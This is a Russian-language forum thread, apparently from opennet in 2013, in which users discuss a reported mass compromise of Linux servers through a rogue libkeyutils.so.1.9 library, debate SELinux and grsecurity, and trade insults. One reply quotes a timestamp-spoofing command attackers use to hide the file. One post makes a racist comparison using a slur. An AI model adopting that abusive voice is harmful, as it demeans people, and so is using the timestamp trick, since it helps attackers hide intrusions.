> Что значит "непатченная система"? В ядре вообще уязвимости редки, остальное обновляется
> "на лету". Поэтому проблем с длинными аптаймами нет, разрушений от этих
> аптаймов нет, а сравнение аптаймами с виндой, где на каждый чих
> перезагрузка требуется, вообще некорректно.

на всякий случай повторю здесь мой исходный камент, чтобы читатели этого милого тредика оценили, с какой скоростью галлюцинирует мой собеседник:

"непатченый линукс встречается так же часто, как и непатченая винда. некоторые этим еще и гордятся, хвастаются у кого аптайм длиннее. "

договорите с голосами в вашей голове - не забудьте принять вещества.

Ответить | Правка | ^ к родителю #193 | Наверх | Cообщить модератору

260. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 18:14 
> на всякий случай повторю здесь мой исходный камент

А вот и откровенное враньё пошло. Исходный коммент был про репутацию систем, и количество глобальных и серъёзных уязвимостей.

Только не надо говорить, что когда писался комментарий про "непатченный linux", автор думал о бабах а не держался контекста разговора.

В результате было по полочкам разложено, что аптайм linux этому всему не помеха (в отличие, кстати, от винды). Но тут у Митрюхи пошли дежурные видения, и он окончательно ушёл от нас в свой сверкающий мир.


как вы уже все надоели. какая сила тянет и тянет вас в интернет самоутверждаться за счёт других людей? Почему вас не научили нормально общаться? Или тоже боитесь, что за доброе слово вас в юноши-мечтатели запишут, а быть прожжёным мудаком это так круто, и в случае чего можно всё свести к одному. Это страх, это та самая социопатия, о которой вещали процентные большевики.

Ответить | Правка | ^ к родителю #245 | Наверх | Cообщить модератору

119. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от 123 (??) on 19-Фев-13, 16:03 
Их довольно быстро закрыли. У тех кто денежку платил проблем практически не было.
Ответить | Правка | ^ к родителю #38 | Наверх | Cообщить модератору

49. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +5 +/
Сообщение от Аноним (??) on 19-Фев-13, 15:04 
Интересно, а с SElinux оно тоже работает?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

66. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 15:15 
А вот это действительно интересный вопрос.
Ответить | Правка | ^ к родителю #49 | Наверх | Cообщить модератору

133. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 16:13 
> Интересно, а с SElinux оно тоже работает?

Зависит от типа атаки и того, на что она была направлена. Если на низкоуровневую фигню, то вряд ли SElinux спасёт. Хотя, при правильной настройке... В общем, на серверах какой-нибудь MAC держать надо в обязательном порядке, для дополнительной защиты.

Ответить | Правка | ^ к родителю #49 | Наверх | Cообщить модератору

343. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 20:21 
> на низкоуровневую фигню, то вряд ли SElinux спасёт.

В случае атак на низкоуровневую фигню его первым делом и отключают в соотв. сплойте. Как по мне - с ним слишком дофига возни при не слишком значительном результате. Проще пилить все на контейнеры+виртуалки, имхо. И изоляция еще более злобная, и возни с ее настройкой в разы меньше. Поднять новый контейнер в разы проще чем политики SELinux редактировать.

Ответить | Правка | ^ к родителю #133 | Наверх | Cообщить модератору

64. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 15:14 
root@gw:~# ls -la /lib64/libkeyutils.so.1.9
-rw-r--r-- 1 root root 9879 Фев 21  2013 /lib64/libkeyutils.so.1.9
root@gw:~# rpm -qf /lib64/libkeyutils.so.1.9
bash: rpm: команда не найдена
root@gw:~# cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04"


и что мне теперь делать!???

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

70. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от mitya (ok) on 19-Фев-13, 15:19 
> root@gw:~# ls -la /lib64/libkeyutils.so.1.9
> -rw-r--r-- 1 root root 9879 Фев 21  2013 /lib64/libkeyutils.so.1.9
> root@gw:~# rpm -qf /lib64/libkeyutils.so.1.9
> bash: rpm: команда не найдена
> root@gw:~# cat /etc/lsb-release
> DISTRIB_ID=Ubuntu
> DISTRIB_RELEASE=12.04
> DISTRIB_CODENAME=precise
> DISTRIB_DESCRIPTION="Ubuntu 12.04"
> и что мне теперь делать!???

Черт, друг, держись. Я тоже не знаю, что нам делать.
Но сейчас чуваки набегут, они нам помогут.

Ответить | Правка | ^ к родителю #64 | Наверх | Cообщить модератору

71. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 15:20 
> root@gw:~# ls -la /lib64/libkeyutils.so.1.9
> -rw-r--r-- 1 root root 9879 Фев 21  2013 /lib64/libkeyutils.so.1.9

Оригинально.

ps. dpkg -S libkeyutlis.so.1.9


> root@gw:~# cat /etc/lsb-release
> DISTRIB_ID=Ubuntu
> DISTRIB_RELEASE=12.04
> DISTRIB_CODENAME=precise
> DISTRIB_DESCRIPTION="Ubuntu 12.04"
> и что мне теперь делать!???

Рассказать о том, какой софт установлен.


Ответить | Правка | ^ к родителю #64 | Наверх | Cообщить модератору

96. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 15:39 
Похоже его всё-таки поломали.

http://packages.ubuntu.com/search?suite=precise&arch=any&mod...

Тут говорят, что последняя версия этой либы - 1.4. Соответственно 1.9 там быть не может.

Ответить | Правка | ^ к родителю #71 | Наверх | Cообщить модератору

99. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 15:42 
Дата "21 февраля 2013" говорит, что все там будем :(
Ответить | Правка | ^ к родителю #96 | Наверх | Cообщить модератору

125. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 16:07 
> Дата "21 февраля 2013" говорит, что все там будем :(

Кто-то увёл машину времени?

Ответить | Правка | ^ к родителю #99 | Наверх | Cообщить модератору

104. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Не я on 19-Фев-13, 15:49 
Да на вброс это похоже.
Ибо при установке время изменения файла меняется на то же что и libkeyutils.so.1.4
Ответить | Правка | ^ к родителю #96 | Наверх | Cообщить модератору

317. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Deluxe (??) on 19-Фев-13, 19:38 
> Тут говорят, что последняя версия этой либы - 1.4. Соответственно 1.9 там
> быть не может.

Совершенно верно, в 12.04 LTS — 1.4. И у меня 1.4.

Ответить | Правка | ^ к родителю #96 | Наверх | Cообщить модератору

88. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним email(??) on 19-Фев-13, 15:31 
Обнови репы, и переустанови keyutils
Ответить | Правка | ^ к родителю #64 | Наверх | Cообщить модератору

109. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Михрютка (ok) on 19-Фев-13, 15:54 
> root@gw:~# ls -la /lib64/libkeyutils.so.1.9
> -rw-r--r-- 1 root root 9879 Фев 21  2013 /lib64/libkeyutils.so.1.9
> root@gw:~# rpm -qf /lib64/libkeyutils.so.1.9
> bash: rpm: команда не найдена
> root@gw:~# cat /etc/lsb-release
> DISTRIB_ID=Ubuntu
> DISTRIB_RELEASE=12.04
> DISTRIB_CODENAME=precise
> DISTRIB_DESCRIPTION="Ubuntu 12.04"
> и что мне теперь делать!???

багрепорт пиши

touch -c -r libkeyutils-1.2.so libkeyutils.so.1.9

вот эта командочка у тебя не отработала.

Ответить | Правка | ^ к родителю #64 | Наверх | Cообщить модератору

72. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –5 +/
Сообщение от Аноним (??) on 19-Фев-13, 15:20 
Вот тут *нормальный* secure boot бы и пригодился. Подписал своим ключиком все бинарники - и хоть обвзламывайся, железо ничего чужого не запустит.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

75. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 15:22 
> Вот тут *нормальный* secure boot бы и пригодился. Подписал своим ключиком все
> бинарники - и хоть обвзламывайся, железо ничего чужого не запустит.

apparmor, например. или та штука, которую недавно в ядро добавили, забыл название.

Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

90. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от XVilka (ok) on 19-Фев-13, 15:34 
А еще лучше - Hardened Gentoo + PaX + grsecurity + SElinux c правильными настройками, и рутовым доступом только через KVM.
Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

144. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –3 +/
Сообщение от исчо_адын_аноним on 19-Фев-13, 16:25 
> А еще лучше - Hardened Gentoo + PaX + grsecurity + SElinux

Хех, а ты п...ый аналитег :) - bluness grsecurity + SElinux  не умеет, Swift grsecurity + SElinux , solar и PeBenito тоже не умеют, Wolsh kak то даже не понял как оно может работать - зато анонимный аналитег на великолепном опеннете всегда готов пернуть в лужу, рассказывая всем , что результат сложения 2+2 достигает 6


Ответить | Правка | ^ к родителю #90 | Наверх | Cообщить модератору

460. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от XVilka (ok) on 20-Фев-13, 08:17 
Это Anthony Basile то не умеет? Ну-ну. Вы бы еще spender-а упомянули. Кроме того, я имел ввиду не grsecurity RBAC, а все остальное, а RBAC от SELinux.
Ответить | Правка | ^ к родителю #144 | Наверх | Cообщить модератору

539. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от исчо_адын_аноним on 20-Фев-13, 17:35 
> Это Anthony Basile то не умеет? Ну-ну. Вы бы еще spender-а упомянули.
> Кроме того, я имел ввиду не grsecurity RBAC, а все остальное,
> а RBAC от SELinux.

не grsecurity RBAC - a ты еще тупее, чем я думал :) PAX путать с грсек'ом ;)
Так шта на опеннете тебе пока что самое место

Ответить | Правка | ^ к родителю #460 | Наверх | Cообщить модератору

592. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 21-Фев-13, 00:16 
> Так шта на опеннете тебе пока что самое место

А вы что тут делаете с таким ЧСВ? Или вы хотели сказать что вы и сами ничем не лучше? Ну ок, засчитано :)

Ответить | Правка | ^ к родителю #539 | Наверх | Cообщить модератору

673. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от исчо_адын_аноним on 21-Фев-13, 18:52 
>> Так шта на опеннете тебе пока что самое место
> А вы что тут делаете с таким ЧСВ? Или вы хотели сказать
> что вы и сами ничем не лучше? Ну ок, засчитано :)

Чешу ;)

Ответить | Правка | ^ к родителю #592 | Наверх | Cообщить модератору

659. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от XVilka (ok) on 21-Фев-13, 17:33 
Никто и не путает. Патчи от grsecurity это не только PaX и RBAC.
Ответить | Правка | ^ к родителю #539 | Наверх | Cообщить модератору

674. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от исчо_адын_аноним on 21-Фев-13, 18:53 
> Никто и не путает. Патчи от grsecurity это не только PaX и
> RBAC.

Ну ок, давай предметно - что еще ?

Ответить | Правка | ^ к родителю #659 | Наверх | Cообщить модератору

675. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от исчо_адын_аноним on 21-Фев-13, 18:55 
> Это Anthony Basile то не умеет? Ну-ну. Вы бы еще spender-а

Komy Anthony Basile , a koму можно и просто Tony.
> Ну-ну. Вы бы еще spender-а

К сожалению, не общался и не знаком.

Ответить | Правка | ^ к родителю #460 | Наверх | Cообщить модератору

282. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от taliano (ok) on 19-Фев-13, 18:49 
Ага. Неделю потратишь на настройку. А потом у админа на непропатченной XP ключи сопрут.
Ответить | Правка | ^ к родителю #90 | Наверх | Cообщить модератору

95. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Dimez (??) on 19-Фев-13, 15:39 
Да-да. лечить следствие, а не причину - это же так модно.
Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

108. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 15:52 
sh mycode.sh - или perl, или python, или ещё что... Вариантов хватит. Суть, в общем-то, в том, что "достаточно безопасная" система попросту неудобна в работе.
Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

111. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 15:57 
лол, если уязвимость в ядре, то ты будешь сам молится пока его не подпишут
Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

346. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 20:28 
> и хоть обвзламывайся, железо ничего чужого не запустит.

Зависит от. Как бы эксплойты зачастую не имеют инкарнации в виде бинарника на диске и являются лишь кусочком хакерского кода в памяти, удачно вброшенным и запущенным при атаке. При этом глубоко похрен какой там у кого secure boot, поскольку этот кусок патчит лишь in-memory барахло. Уже после верификации. А криптографически верифицировать вообще каждое обращение к памяти - дико накладно по скорости, однако.

Другое дело что вписаться в загрузку на постоянной основе руткиту после этого станет намного проблематичнее. Если у него конечно была такая цель.

Ответить | Правка | ^ к родителю #72 | Наверх | Cообщить модератору

103. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от redwolf (ok) on 19-Фев-13, 15:48 
В Челябинске упал метеорит, массовый взлом серверов на базе Linux... Неплохо так год начинается... Насыщенно.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

114. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 15:59 
> В Челябинске упал метеорит, массовый взлом серверов на базе Linux... Неплохо так
> год начинается... Насыщенно.

Инопланетный разум с метеорита ломанул все сервера на базе Linux :-)

Ответить | Правка | ^ к родителю #103 | Наверх | Cообщить модератору

163. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 16:42 
> Инопланетный разум с метеорита ломанул все сервера на базе Linux :-)

Судя по всему - таки не все. У себя такого не вижу.

Ответить | Правка | ^ к родителю #114 | Наверх | Cообщить модератору

107. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +4 +/
Сообщение от Анонимовец on 19-Фев-13, 15:52 
Разговор ни о чем. Наличие панелей говорит о том, что владельцы - вендузятники. Вполне могли потерять пароли от своих любимых winscp и putty.exe.

http://vms.drweb.com/virus/?i=2301243
http://news.drweb.com/?i=3280&c=5&lng=ru&p=0

>Также в январе был зафиксирован факт распространения новой модификации давно известной вредоносной программы семейства BackDoor.Butirat — BackDoor.Butirat.245. Данный троянец способен загружать на инфицированный компьютер и запускать на нем исполняемые файлы по команде с управляющего сервера, а также красть пароли от популярных FTP-клиентов.

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

110. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от Михрютка (ok) on 19-Фев-13, 15:57 
> Наличие панелей говорит о том, что владельцы -
> дешевые говнохостеры.

я поправил. не благодари, бро.

Ответить | Правка | ^ к родителю #107 | Наверх | Cообщить модератору

128. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 16:09 
> Вполне могли потерять пароли от своих любимых winscp и putty.exe.

Не пароли а просто привкеи для логина на серванты.

Ответить | Правка | ^ к родителю #107 | Наверх | Cообщить модератору

169. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –6 +/
Сообщение от prokoudine email(ok) on 19-Фев-13, 16:56 
> Наличие панелей говорит о том, что владельцы - вендузятники.

Сколько презрения и пафоса одновременно. 13 лет уже исполнилось?

Ответить | Правка | ^ к родителю #107 | Наверх | Cообщить модератору

194. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 17:22 
ну, вообще-то довольно вероятный вариант
Ответить | Правка | ^ к родителю #169 | Наверх | Cообщить модератору

212. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от prokoudine email(ok) on 19-Фев-13, 17:38 
> ну, вообще-то довольно вероятный вариант

Что 13 лет исполнилось? :) ОК, возможно, комментатору даже 15. Отчаянное минусование косвенно подверждает малолетний баттхёрт :)

Это всё детский сад из серии "кде для конфигурастов", "гном для идиотов" и т.д. Берём что-то, что не нравится, и делаем вид, что это атрибут кого-то, кто не нравится. Как раз уровень средней школы.

Ответить | Правка | ^ к родителю #194 | Наверх | Cообщить модератору

215. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +2 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 17:41 
> Что 13 лет исполнилось? :) ОК, возможно, комментатору даже 15. Отчаянное минусование
> косвенно подверждает малолетний баттхёрт :)
> Это всё детский сад из серии "кде для конфигурастов", "гном для идиотов"
> и т.д. Берём что-то, что не нравится, и делаем вид, что
> это атрибут кого-то, кто не нравится. Как раз уровень средней школы.

У меня другое наблюдение. Что те, кто всё сводят к возрасту, явно имеют какой-то комплекс на этой почве. И, когда они наконец-то ДОРОСЛИ, начинают на правах старых попрекать возрастом других.

Не вижу особо, как возраст бы коррелировал с нормальным общением.

Ответить | Правка | ^ к родителю #212 | Наверх | Cообщить модератору

241. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –2 +/
Сообщение от prokoudine email(ok) on 19-Фев-13, 18:00 
> Не вижу особо, как возраст бы коррелировал с нормальным общением.

Я не про биологический возраст, а про психологический. Можно дожить до полтинника и продолжать рассуждать как школоло с юношеским максимализмом. И это очень печально.


Ответить | Правка | ^ к родителю #215 | Наверх | Cообщить модератору

254. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 18:07 
> Я не про биологический возраст, а про психологический.

А причём здесь тогда "13 лет"?


> Можно дожить до полтинника и продолжать рассуждать как школоло с юношеским максимализмом. И это очень печально.

А можно строить из себя рассудительного и правильного, но прокалываться на каждой мелочи. Когда у человека есть мнение - это гораздо полезнее, чем когда он повторяет только то, что принято.

Юношеский максимализм обычно вылетает с выбитыми зубами и с осознанием невозможности что-то сделать. Только вся наша жизнь - это достижения тех, кто не мирился с какой-то там невозможностью. :) Иначе говоря, страх "а вдруг моё мнение не поймут, буду поспокойнее" - это защитная реакция, это не значит, что индивидуум перестал так думать, это обычно значит, что индивидуум стал говорить "как тут заведено", чтобы его каждый первый не тыкал в лицо со своим "школьником".

И в результате любая тема превращается в занудное одинаковое непродуктивное нытьё. Зато все такие взрослые и умные, что банально поговорить, нормально поговорить не с кем. И сообщества никакого нет, потому что все по углам сидят и взрослость берегут.


У Чуковского есть гениальная, на мой взгляд, книжка "От двух до пяти". И чем больше я смотрел на своих детей в промежутке от двух до пяти, тем больше видел, чему мы у них можем научиться.

Ответить | Правка | ^ к родителю #241 | Наверх | Cообщить модератору

276. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от prokoudine email(ok) on 19-Фев-13, 18:36 
>> Я не про биологический возраст, а про психологический.
> А причём здесь тогда "13 лет"?

Это же классика, ну :)

> Когда у человека есть мнение - это гораздо полезнее, чем
> когда он повторяет только то, что принято.

Не надо оправдывать идиотизм относительностью. Иначе мы так договоримся до того, что воровство лучше убийства.

> И в результате любая тема превращается в занудное одинаковое непродуктивное нытьё.

Именно максималистские лозунги и делают обсуждения непродуктивными. Обсуждаемый нами комментатор не высказал не то что ни одной оригинальной идеи, он даже неоригинальную идею изуродовал до неузнаваемости. Попробуйте на досуге логически связать панели управления и потерю пароля от winscp. Зато в комменте был лозунг. А лозунг заменяет логику, ага.

Ответить | Правка | ^ к родителю #254 | Наверх | Cообщить модератору

284. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 18:52 
>> Когда у человека есть мнение - это гораздо полезнее, чем
>> когда он повторяет только то, что принято.
> Не надо оправдывать идиотизм относительностью. Иначе мы так договоримся до того, что
> воровство лучше убийства.

Как будто до этого тут был абсолютный порядок, и один комментатор всё нарушил. Тут сплошные воровства и убийства. И уж лучше в этом хаосе будут робин-гуды, чем банальное мочилово и воровалово.


>> И в результате любая тема превращается в занудное одинаковое непродуктивное нытьё.
> Именно максималистские лозунги и делают обсуждения непродуктивными.

Иногда это ирония, иногда это констатация печальной действительности. Сами по себе они ничего страшного не несут, мешает только их перебор. И перебор мешает во всём, даже самое остроумное замечание при 55-м повторении теряет всю прелесть.

Не буду судить пост автора, но про панели я на опеннете точно слышал реже, чем 55 раз.


> Обсуждаемый нами комментатор не высказал не то что ни одной оригинальной идеи, он
> даже неоригинальную идею изуродовал до неузнаваемости. Попробуйте на досуге логически
> связать панели управления и потерю пароля от winscp.

Легко. Когда кто-то хочет связать мощь linux и старые привычки покорителя бездумных стрелялок и бухгалтерий, он соединяется с сервером через win-клиент из привычного windows, и может смело запустить какой-то установщик с проприетарным приложением, не делающий ничего понятного, и перезаписывающий файлы. Скорее всего, он с такой же безалаберностью относится и к собственной безопасностью. Это просто мечта для хакера - бесплатный пароль на linux.

Другие категории попадают под это с мизерной вероятностью: тот, у кого пароли не умыкнёшь, тот скорее всего не будет пользоваться панелями. У кого нет никаких linux-серверов, тот тоже не будет пользоваться панелями, как и ssh-клиентами.

Поэтому ответ на головоломку такой: виноват пользователь Windows. Обычно именно у него воруют пароли на ssh. И обычно именно он ставит боекомплект "centos + панель". Это когда сознание "нужен linux" уже проснулось, а осознание "linux - это что?" - ещё нет.


> Зато в комменте был лозунг. А лозунг заменяет логику, ага.

Если вы хотите привести к порядку, то вы не с того начинаете. Если вам просто что-то не нравится, то вы не решили ни одной проблемы.

Решают не тексты, слова, лозунги. Решает заложенный в них смысл, идея, её уместность. Только причём здесь молодость и опыт? Никто не может привести опеннет к порядку, никто не может придать сообществу подобие сообщества, а посему тут большинство себя будут так вести, потому что тут так заведено. Даже я не устоял... :) воздух тут такой, погода благоприятствовала любви, наверное... :)

Ответить | Правка | ^ к родителю #276 | Наверх | Cообщить модератору

323. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от prokoudine email(ok) on 19-Фев-13, 19:41 
Я понимаю Ваше желание многословно и витиевато изливать мысли, но давайте вернёмся на бренную землю.

Есть хостинг, которым надо рулить. Есть панель, которая автоматизирует решение этой задачи.

Какое к этому отношение имеет операционная система у пользователя, которые периодически лазит в панель, будь он сотрудником хостера или же клиентом?

Вот эту логическую цепочку постройте. Больше ничего не надо.

Ответить | Правка | ^ к родителю #284 | Наверх | Cообщить модератору

240. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 18:00 
что ломали через винду. Хотя против, конечно, то, что вроде только redhat-based системы. А так - сколько раз такое уже было...
Ответить | Правка | ^ к родителю #212 | Наверх | Cообщить модератору

246. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от prokoudine email(ok) on 19-Фев-13, 18:03 
> что ломали через винду. Хотя против, конечно, то, что вроде только redhat-based
> системы. А так - сколько раз такое уже было...

Мне кажется, что в данном случае надо просто подождать, пока не разберутся и не найдут уязвимость, и уже потом делать выводы.

Ответить | Правка | ^ к родителю #240 | Наверх | Cообщить модератору

259. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Crazy Alex (ok) on 19-Фев-13, 18:12 
вообще да, но иногда хочется попророчить :-)
Ответить | Правка | ^ к родителю #246 | Наверх | Cообщить модератору

266. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 18:19 
> вообще да, но иногда хочется попророчить :-)

В наших реалиях медия - это всё. Важно не то, что было на самом деле, а то, что об этом говорят.

Захотели опустить редхат - собрались и пустили слух. Затраты - копеечные, прямая выгода небольшая, но косвенную вообще не посчитаешь. Надо будет за курсом акций RH посмотреть, отразится ли это как-то. Если отразится, то, как говорили древние, "ищи, кому выгодно".

Ответить | Правка | ^ к родителю #259 | Наверх | Cообщить модератору

279. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от prokoudine email(ok) on 19-Фев-13, 18:44 
>> вообще да, но иногда хочется попророчить :-)
> В наших реалиях медия - это всё. Важно не то, что было
> на самом деле, а то, что об этом говорят.
> Захотели опустить редхат - собрались и пустили слух.

"Иногда сигара — это просто сигара" (с)

Ответить | Правка | ^ к родителю #266 | Наверх | Cообщить модератору

286. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 18:58 
>> В наших реалиях медия - это всё. Важно не то, что было
>> на самом деле, а то, что об этом говорят.
>> Захотели опустить редхат - собрались и пустили слух.
> "Иногда сигара — это просто сигара" (с)

Меня тоже не интересует, как было на самом деле. Меня интересует, что мешает это сделать? Что мешает гадить в репутацию своему конкуренту, пользуясь сомнительными схемами? Пятно на репутации? Да там этих пятен столько, что незапятнанное место найти сложно.

Иногда капиталист - тоже человек, но когда он слышит про деньги, можно об этом смело забыть.


Даже если поверить в то, что широкие массы приходят, чтобы тратить на дискредитацию конкурентов сотни часов в месяц БЕСПЛАТНО, то почему бы не использовать эти ресурсы, которые сами идут в руки? Врождённое чувство благородства, что ли? Тогда где они были тогда, когда их за руку ловили?

Ответить | Правка | ^ к родителю #279 | Наверх | Cообщить модератору

350. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Аноним (??) on 19-Фев-13, 20:49 
> только redhat-based системы.

А есть уверенность что только их? Просто хостеры по неким причинам их лю.

Ответить | Правка | ^ к родителю #240 | Наверх | Cообщить модератору

349. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от Анонимовец on 19-Фев-13, 20:43 
>> Наличие панелей говорит о том, что владельцы - вендузятники.
> 1. Сколько презрения и пафоса одновременно. 13 лет уже исполнилось?
> 2. то 13 лет исполнилось? :) ОК, возможно, комментатору даже 15. Отчаянное минусование косвенно подверждает малолетний баттхёрт :)
> 3. Я не про биологический возраст, а про психологический.
> 4. Именно максималистские лозунги и делают обсуждения непродуктивными.
> 5. Я понимаю Ваше желание многословно и витиевато изливать мысли, но давайте вернёмся на бренную землю.
> 6. Мне кажется, что в данном случае надо просто подождать, пока не разберутся и не найдут уязвимость, и уже потом делать выводы.
> 7. "Иногда сигара — это просто сигара" (с

Нет, ты.

Ответить | Правка | ^ к родителю #169 | Наверх | Cообщить модератору

415. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от all_glory_to_the_hypnotoad (ok) on 19-Фев-13, 23:06 
клоун, на себя бы посмотрел сначала
Ответить | Правка | ^ к родителю #169 | Наверх | Cообщить модератору

428. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Led (ok) on 20-Фев-13, 01:16 
>> Наличие панелей говорит о том, что владельцы - вендузятники.
> Сколько презрения и пафоса одновременно. 13 лет уже исполнилось?

Вендузоида легко "обидеть", как и негра. Негру скажи, что он негр - обидится. Вендузоиду скажи, что он вендузоид - тоже обидится. Вот такие они (негры и вендузоиды) странные. Проэтому приходится смягчать факти и говорить негру, что он "чёрный, африканец", а вендузоиду, что он "хомячок, придурок, идиот", чтобы хоть как смягчить факты и так их (негров и вендузоидов) "не расстраивать".

Ответить | Правка | ^ к родителю #169 | Наверх | Cообщить модератору

454. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от SergMarkov email(ok) on 20-Фев-13, 07:02 
> Вендузоида легко "обидеть", как и негра. Негру скажи, что он негр -
> обидится. Вендузоиду скажи, что он вендузоид - тоже обидится.

99.99 % из них просто не обратят на это внимание и не поймут о чем вообще им хотят сказать.


Ответить | Правка | ^ к родителю #428 | Наверх | Cообщить модератору

124. "В Сети зафиксирован массовый взлом серверов на базе Linux"  –1 +/
Сообщение от Михрютка (ok) on 19-Фев-13, 16:07 
тред на вебхостинге доставляет.

I have found out that removing /lib/libkeyutils.so.1.9 breaks python (therefore yum too) and named server.

Quote:
Service: nameserver
Notification Type: failed
Notification: nameserver failed @ Tue Feb 19 10:16:02 2013. A restart was attempted automagically.
Service Check Method: [check command]
Number of Restart Attempts: 4
Service Check Raw Output:

named is not running

Startup Log:

Starting named: /usr/sbin/named-checkconf: error while loading shared libraries: libkeyutils.so.1: cannot open shared object file: No such file or directory
/etc/init.d/named: line 57: [: too many arguments
[FAILED]
After i put back lib file, it started ok and python/yum started to work normally.
So is this a false positive notification from CSF or?

чо-то слабенько, надо было сразу от корня все выжигать. кстати, товарища с libnss3 в корне это тоже касается.

ссссссссцу^W, кто ж им права выдает, а?

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

126. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +/
Сообщение от Анонимовец on 19-Фев-13, 16:08 
Вендузятнике же.
Ответить | Правка | ^ к родителю #124 | Наверх | Cообщить модератору

129. "В Сети зафиксирован массовый взлом серверов на базе Linux"  +1 +/
Сообщение от бедный буратино (ok) on 19-Фев-13, 16:09 
> I have found out that removing /lib/libkeyutils.so.1.9 breaks python

И тут из демонической личности взломщика начинают лезть такие конкретные человеческие уши arisu :)

Ответить | Правка | ^ к родителю #124 | Наверх | Cообщить модератору

